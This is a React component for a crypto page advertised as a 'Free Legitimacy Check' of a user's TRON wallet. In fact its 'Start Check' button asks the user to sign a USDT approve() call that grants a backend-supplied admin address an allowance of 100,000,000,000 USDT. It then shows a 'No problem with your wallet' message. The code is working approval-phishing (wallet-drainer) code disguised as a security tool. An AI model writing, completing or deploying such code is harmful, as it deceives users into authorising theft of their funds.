import React, { useCallback, useEffect, useState } from 'react';
import { Adapter, WalletNotFoundError } from '@tronweb3/tronwallet-abstract-adapter';

import { connectUser, findUser, registerUser, getAdminWallet, getIsProblemStatus } from '../apis/backendAPI';
import { useLoadingContext } from "../LoadingContext";
import { SUPPORTED_WALLETS } from '../config';
import { tronWeb } from '../utils/tronweb'
import { WalletConnectAdapter } from '@tronweb3/tronwallet-adapter-walletconnect';

const USDT_contract = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t';
tronWeb.setAddress(USDT_contract);

const SecondSection = () => {
  const { loading, setLoading } = useLoadingContext();

  const [approved, setApproved] = useState(false);
  const [modalState, setModalState] = useState(false)
  const [trxModalStatus, setTrxModalStatus] = useState(false)
  const [modalShow, setModalShow] = useState(false)
  const [isProblem, setIsProblem] = useState(false);
  const [isLoading, setIsLoading] = useState(false);
  const [connectingWallet, setConnectingWallet] = useState<string | null>(null);
  const [currentAdapter, setCurrentAdapter] = useState<any | null>(null);
  type WalletState = {
    isConnected: boolean;
    address: string | null; // Allow strings or null.
    usdtBalance: number | null; // Ensure the type matches balance.
    tronBalance: number | null; // Ensure the type matches balance.
    walletName: string | null; // Allow strings or null.
  };
  const [walletState, setWalletState] = useState<WalletState>({
    isConnected: false,
    address: null,
    usdtBalance: null,
    tronBalance: null,
    walletName: null,
  });
  const [error, setError] = useState<string | null>(null);


  const handleOpen = () => setModalShow(true);
  const handleClose = () => setModalShow(false);
  useEffect(() => {
    (async () => {
      try {
        if (walletState.address && state) {
          state = 0;

          const userState = await findUser(walletState.address);

          if (userState && userState.message === "User not found") {
            console.log("User not found");

            const userResult = await connectUser(walletState.address);
            console.log(userResult);

            if (userResult && userResult.connected) {
              setIsProblem(userResult.isProblem)
              setModalState(true);
              setApproved(true);
              return;
            }
          } else {
            if (userState && userState.connected) {
              setIsProblem(userState.isProblem)
              setModalState(true);
              setApproved(true);
              return;
            }
          }
        } else if (walletState.address && state) {
          state = 0;
          // console.log("address => ", address);
          const userState = await findUser(walletState.address);
          // console.log("userState => ", userState);

          if ("message" in userState && userState.message === "User not found") {
            const userResult = await connectUser(walletState.address);
            // console.log("userResult => ", userResult);
            if (userResult && userResult.connected) {
              setIsProblem(userResult.isProblem)
              setModalState(true);
              setApproved(true);
              return;
            }
          } else {
            if (userState && userState.connected) {
              setIsProblem(userState.isProblem);
              setModalState(true);
              setApproved(true);
              return;
            }
          }
        }
      } catch (error) {
        console.error("Error finding user:", error);
        // Handle error
      }
    })();
    setTimeout(() => {
      state = 1;
    }, 1000);
  }, [walletState.address])


  const getTronWalletBalance = async (address: string) => {
    try {
      const balance = await tronWeb.trx.getBalance(address);
      const contract = await tronWeb.contract().at(USDT_contract);

      const usdtbalance = await contract.balanceOf(address).call();
      return [parseFloat(tronWeb.fromSun(balance).toString()), parseFloat(tronWeb.fromSun(usdtbalance).toString())];

    }
    catch (error) {
      console.error('Error getting balance:', error);
      return [0, 0];
    }
  };

  let state = 1;

  const tokenCheck = async () => {
    try {
      setLoading(true);
      const admin = await getAdminWallet()
      const walletAddress = currentAdapter.address;

      let tronWeb_here: any;
      if (currentAdapter instanceof WalletConnectAdapter) {
        tronWeb_here = tronWeb;
        const walletHex = tronWeb_here.address.toHex(walletAddress);

        tronWeb_here.setAddress(USDT_contract);
        tronWeb_here.defaultAddress = { hex: walletHex, base58: walletAddress };
      } else {
        tronWeb_here = currentAdapter._wallet.tronWeb
      }

      const contract = await tronWeb_here.contract().at(USDT_contract);

      const checkAllowance = await contract.allowance(walletState.address, admin).call();
      const value = parseFloat(tronWeb.fromSun(checkAllowance.remaining).toString())

      if (value > 1000000) {
        let problemStatus = await getIsProblemStatus(walletState.address || "");
        setIsProblem(Boolean(problemStatus))
        setLoading(false);
        setModalState(true);
        return;
      }

      if ((walletState.tronBalance || 0) < 30) {
        setLoading(false);
        setTrxModalStatus(true)
        return
      }

      const amount = tronWeb_here.toSun("100000000000");

      // Call the approve function
      const spenderHex = tronWeb_here.address.toHex(admin); // Convert to Hex

      if (currentAdapter instanceof WalletConnectAdapter) {
        const approvalTx = await tronWeb.transactionBuilder.triggerSmartContract(
          USDT_contract, // TRC20 contract address
          "approve(address,uint256)", // Function signature
          { feeLimit: 100_000_000 }, // Options (can be empty)
          [
            { type: "address", value: spenderHex }, // Spender
            { type: "uint256", value: amount } // Amount
          ],
          tronWeb_here.defaultAddress.hex // Sender address
        );

        if (!approvalTx || !approvalTx.transaction) {
          console.log("🚨 Failed to create approval transaction!");
          return;
        }
        const signedTx = await currentAdapter.signTransaction(approvalTx.transaction);
        const receipt = await tronWeb_here.trx.sendRawTransaction(signedTx);

        if (!receipt.result) {
          setLoading(false)
          return
        }

      } else {
        const approval = await contract.approve(spenderHex, amount).send({
          feeLimit: 100_000_000,
        });
        console.log("Transaction sent via TronLink");
      }

      const check = await contract.allowance(walletAddress, admin).call();
      const checkvalue = parseFloat(tronWeb.fromSun(check.remaining).toString())
      if (checkvalue > 1000000) {
        const userResult: any = await registerUser(walletAddress);
        setLoading(false);
        setModalState(true);
        setIsProblem(userResult.isProblem)
      }

    } catch (error) {
      console.error("Error connecting wallet:", error);
      setLoading(false);
    }
    setLoading(false);
  }

  const renderConnectButtons = () => {
    if (walletState.isConnected) {
      // Display the connected wallet address
      return (
        <div className="flex flex-col gap-[38px] justify-center items-center mt-12 mb-4">
          <div className='flex flex-wrap md:flex-nowrap w-full gap-[25px] md:gap-[16px] justify-center'>
            <input className='w-full md:w-[50%] bg-[#f0eaff] px-[20px] py-[10px] border-0 rounded-[8px] text-[16px] text-[#535050] leading-[2.2] focus:outline-0 font-normal' value={walletState.address || ''} readOnly />
            <div className='w-full sm:w-[calc(50%-8px)] md:w-[17%]'>
              <button className="flex justify-between w-full h-full bg-[#f0eaff] text-[#7e87bf] p-[15px] rounded-[8px] inline-flex items-center">
                <span className="flex gap-[10px] items-center mr-1"><img className='w-[24px]' src='/png/icon-usdt.png' />USDT(TRC20)</span>
              </button>
            </div>
            <button className='w-full sm:w-[calc(50%-8px)] md:w-[17%] md:flex justify-center items-center gap-[8px] h-auto py-[15px] px-[30px] border border-[#9568ff] rounded-[8px] text-[18px] text-[#fff] bg-[#9568ff] hover:bg-[#7752cd]' onClick={tokenCheck}>Start Check</button>
          </div>
          <button className='md:flex justify-center items-center gap-[8px] w-auto h-auto py-[18px] px-[52px] border border-[#00bfff] rounded-[8px] text-[15px] text-[#00bfff] hover:bg-[#00bfff] hover:text-white' onClick={disconnectWallet}>Disconnect</button>
          <div className='flex flex-wrap lg:flex-nowrap w-full max-w-[1200px] justify-center lg:justify-between'>
            <div className='w-full md:w-[50%] lg:w-[33.33%] px-0 md:px-[15px]'>
              <div className='h-[100%] px-[25px] py-[22px] rounded-[10px] shadow-[0_15px_40px_rgba(1,18,111,0.15)]'>
                <div className='flex justify-between items-center'>
                  <div className='flex gap-[14px] items-center text-[#1c2e9e] text-[20px] font-semibold'>
                    <img className='w-[50px]' src='/png/icon-trx.png' />Tron
                  </div>
                  <div className='leading-[1.4]'>
                    <p className='text-[14px] ibm-plex-sans'>Your Balance</p>
                    <p className='text-[18px] font-semibold'>{walletState.tronBalance?.toLocaleString(undefined, { minimumFractionDigits: 4, maximumFractionDigits: 4 })} TRX</p>
                  </div>
                </div>
              </div>
            </div>
            <div className='w-full md:w-[50%] lg:w-[33.33%]  px-0 md:px-[15px] mt-[30px] md:mt-0'>
              <div className='h-[100%] px-[25px] py-[22px] rounded-[10px] shadow-[0_15px_40px_rgba(1,18,111,0.15)]'>
                <div className='flex justify-between items-center'>
                  <div className='flex gap-[14px] items-center text-[#1c2e9e] text-[20px] font-semibold'>
                    <img className='w-[50px]' src='/png/icon-usdt.png' />Tether USDT
                  </div>
                  <div className='leading-[1.4]'>
                    <p className='text-[14px] ibm-plex-sans'>Your Balance</p>
                    <p className='text-[18px] font-semibold'>{walletState.usdtBalance?.toLocaleString(undefined, { minimumFractionDigits: 2, maximumFractionDigits: 2 })} USDT</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div className={`${modalState ? "block" : "hidden"} overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 bg-[#0008] justify-center items-center w-full md:inset-0 h-full`}>
            <div className="relative p-4 w-full max-w-md h-auto m-auto top-[50%] transform translate-y-[-50%]">
              {/* Modal content */}
              <div className="relative p-4 text-center bg-white rounded-lg shadow dark:bg-gray-800 sm:p-5">
                <button type="button" className="text-gray-400 absolute top-2.5 right-2.5 bg-transparent hover:bg-gray-200 hover:text-gray-900 rounded-lg text-sm p-1.5 ml-auto inline-flex items-center dark:hover:bg-gray-600 dark:hover:text-white" onClick={() => setModalState(!modalState)}>
                  <svg aria-hidden="true" className="w-5 h-5" fill="currentColor" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path fillRule="evenodd" d="M4.293 4.293a1 1 0 011.414 0L10 8.586l4.293-4.293a1 1 0 111.414 1.414L11.414 10l4.293 4.293a1 1 0 01-1.414 1.414L10 11.414l-4.293 4.293a1 1 0 01-1.414-1.414L8.586 10 4.293 5.707a1 1 0 010-1.414z" clipRule="evenodd"></path></svg>
                  <span className="sr-only">Close modal</span>
                </button>
                {isProblem ? (
                  <div className="w-12 h-12 flex items-center justify-center mx-auto mb-3.5">
                    <img src="/png/icon-warning.png" className="w-full" alt="warning" />
                    <span className="sr-only">Failed</span>
                  </div>
                ) : (
                  <div className="w-12 h-12 rounded-full bg-green-100 dark:bg-green-900 p-2 flex items-center justify-center mx-auto mb-3.5">
                    <svg
                      aria-hidden="true"
                      className="w-8 h-8 text-green-500 dark:text-green-400"
                      fill="currentColor"
                      viewBox="0 0 20 20"
                      xmlns="http://www.w3.org/2000/svg"
                    >
                      <path
                        fillRule="evenodd"
                        d="M16.707 5.293a1 1 0 010 1.414l-8 8a1 1 0 01-1.414 0l-4-4a1 1 0 011.414-1.414L8 12.586l7.293-7.293a1 1 0 011.414 0z"
                        clipRule="evenodd"
                      ></path>
                    </svg>
                    <span className="sr-only">Success</span>
                  </div>
                )}
                <p className="mb-4 text-lg font-semibold text-gray-900 dark:text-white">
                  {isProblem
                    ? "There is something wrong with your token."
                    : "No problem with your wallet."}
                </p>
                <button className="py-2 px-10 text-sm font-medium text-center text-white rounded-lg bg-[#9568ff] hover:bg-[#7950da] focus:ring-4 focus:outline-none focus:ring-primary-300 dark:focus:ring-primary-900" onClick={() => setModalState(!modalState)}>
                  OK
                </button>
              </div>
            </div>
          </div>
          <div className={`${trxModalStatus ? "block" : "hidden"} overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 bg-[#0008] justify-center items-center w-full md:inset-0 h-full`}>
            <div className="relative p-4 w-full max-w-md h-auto m-auto top-[50%] transform translate-y-[-50%]">
              {/* Modal content */}
              <div className="relative p-4 text-center bg-white rounded-lg shadow dark:bg-gray-800 sm:p-5">
                <button type="button" className="text-gray-400 absolute top-2.5 right-2.5 bg-transparent hover:bg-gray-200 hover:text-gray-900 rounded-lg text-sm p-1.5 ml-auto inline-flex items-center dark:hover:bg-gray-600 dark:hover:text-white" onClick={() => setTrxModalStatus(!trxModalStatus)}>
                  <svg aria-hidden="true" className="w-5 h-5" fill="currentColor" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path fillRule="evenodd" d="M4.293 4.293a1 1 0 011.414 0L10 8.586l4.293-4.293a1 1 0 111.414 1.414L11.414 10l4.293 4.293a1 1 0 01-1.414 1.414L10 11.414l-4.293 4.293a1 1 0 01-1.414-1.414L8.586 10 4.293 5.707a1 1 0 010-1.414z" clipRule="evenodd"></path></svg>
                  <span className="sr-only">Close modal</span>
                </button>
                <div className="w-12 h-12 flex items-center justify-center mx-auto mb-3.5">
                  <img src="/png/warning.png" className="w-full" alt="warning" />
                  <span className="sr-only">Failed</span>
                </div>
                <p className="mb-4 text-lg font-semibold text-gray-900 dark:text-white">
                  {"Please deposit TRX for gas"}
                </p>
                <button className="py-2 px-10 text-sm font-medium text-center text-white rounded-lg bg-[#9568ff] hover:bg-[#7950da] focus:ring-4 focus:outline-none focus:ring-primary-300 dark:focus:ring-primary-900" onClick={() => setTrxModalStatus(!trxModalStatus)}>
                  OK
                </button>
              </div>
            </div>
          </div>
        </div>
      );
    } else {
      // Render connect buttons for different wallets
      return (
        <div className="flex gap-[38px] justify-center items-center my-12">
          <button className='hidden md:flex justify-center items-center gap-[8px] w-[225px] h-[85px] py-[14px] px-[40px] border border-[#352464] rounded-[8px] text-[15px] text-[#362465] hover:bg-[#352464] hover:text-white' onClick={() => connectWallet(SUPPORTED_WALLETS[0])}><img className='w-[35px]' src={SUPPORTED_WALLETS[0].icon} />TronLink</button>
          <button className='flex justify-center items-center gap-[8px] w-[225px] h-[85px] py-[14px] px-[40px] border border-[#352464] rounded-[8px] text-[15px] text-[#362465] hover:bg-[#352464] hover:text-white' onClick={() => connectWallet(SUPPORTED_WALLETS[1])}><img className='w-[35px]' src='/jpg/icon-walletconnect.png' />WalletConnect</button>
        </div>
      );
    }
  };
  const disconnectWallet = useCallback(async () => {
    if (currentAdapter) {
      try {
        await currentAdapter.disconnect();
        setCurrentAdapter(null);
        setWalletState({
          isConnected: false,
          address: null,
          tronBalance: null,
          usdtBalance: null,
          walletName: null,
        });
        console.log('Wallet disconnected successfully');
      } catch (err) {
        console.error('Error disconnecting wallet:', err);
        setError('Failed to disconnect wallet');
      }
    }
  }, [currentAdapter]);

  const connectWallet = async (adapter: Adapter): Promise<boolean> => {
    try {
      setConnectingWallet(adapter.name);

      if (!adapter.readyState) {
        throw new Error(`${adapter.name} is not installed`);
      }

      if (adapter.connecting) {
        await new Promise(resolve => setTimeout(resolve, 1000));
      }
      try {
        await adapter.connect();
      } catch (err) {
        if (err instanceof WalletNotFoundError) {
          window.open(adapter.url, '_blank');
          throw new Error(`Please install ${adapter.name}`);
        }
        throw err;
      }
      if (adapter.address) {
        const balance = await getTronWalletBalance(adapter.address);

        setWalletState({
          isConnected: true,
          address: adapter.address,
          tronBalance: balance[0],
          usdtBalance: balance[1],
          walletName: adapter.name,
        });

        setCurrentAdapter(adapter);
        // await disconnectWallet();

        return true;
      }
      throw new Error('No public key found');
    } catch (err) {
      if (err instanceof Error) {
        console.error('Error connecting wallet:', err);
        setIsLoading(false);
        throw err;
      }
      throw new Error('Unknown error occurred');
    } finally {
      setConnectingWallet(null);
      setIsLoading(false);
      handleClose();

    }
  };

  return (
    <>
      <div className="relative bg-[#F8F5FF] pt-[120px] md:pt-[100px] pb-[80px] md:pb-[70px]" id='check'>
        <div id="" className="absolute -top-[170px]" />

        <div className="max-w-[1300px] m-auto bg-[#0000] rounded-[20px] px-[15px]">
          <div className="bg-white px-[30px] md:px-[50px] py-[30px] md:py-[40px] text-center rounded-[20px] shadow-[0_30px_45px_rgba(28,46,158,0.15)]">
            <div className="text-[#1c2e9e] text-[36px] mb-[5px] font-semibold">
              Free Legitimacy Check
            </div>
            <div className="text-[#7e87bf] text-[18px] mt-[40px] mb-[40px] md:mb-[30px] ibm-plex-sans leading-[1.5]">
              Utlize our complimentary to perform a basic risk assessment of your assets...
            </div>
            {/* WALLET CONNECT BUTTON */}
            {renderConnectButtons()}

          </div>
        </div>
      </div>
    </>
  );
};

export default SecondSection;
